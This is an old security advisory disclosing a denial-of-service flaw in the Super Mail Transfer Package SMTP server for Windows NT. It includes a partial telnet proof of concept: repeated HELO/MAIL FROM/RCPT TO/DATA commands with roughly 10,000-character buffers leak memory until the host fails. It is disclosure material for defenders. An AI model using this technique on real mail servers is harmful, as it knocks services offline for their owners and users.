Source of Binary D.O.S
USSR Advisory Code: USSR-2000031
January 13, 2000
Nosque Workshop, Super Mail Transfer Package (PORT 25) Server for
WinNT Version 1.9x and maybe
A memory leak exists in the Super Mail Transfer Package that may
cause an NT host to stop functioning and/or need to be rebooted.
The memory leak may occur when you connect to the SMTP port,
all information you send to the system will be stored in memory,
and SMTP support multiples HELO/ MAIL FROM/ RCPT TO / DATA in the
If you did multiple HELO/ MAIL FROM/ RCPT TO / DATA in the same
connection the memory may not be deallocated. This condition may
cause the computer to stop functioning the moment memory runs out.
[email@example.com$ telnet example.com 25
Connected to example.com.
Escape character is '^]'.
220 MachineNamet AttackerIp with SMTP for NT BD0198
250 Hello, AtackerHostName AttackerIp
250 to: ok
354 Send Mail Message Body; End with .
If you repeat this commands all information passed to the server will
be stored in memory thus the memory leak problem,
Where [buffer] is aprox. 10000 characters.
Do you do the w00w00?
This advisory also acts as part of w00giving. This is another
contribution to w00giving for all you w00nderful people out there.
You do know what w00giving is don't you?
Vendor Url: http://www.web-net.com/supermail/
Program Url: http://shareit1.element5.com/programs.html?nr=100364
The related problems are fixed in the next generation of SMTP call
EEye, Attrition, w00w00, beavuh, Rhino9, ADM, L0pht, HNN,
Technotronic and Wiretrip.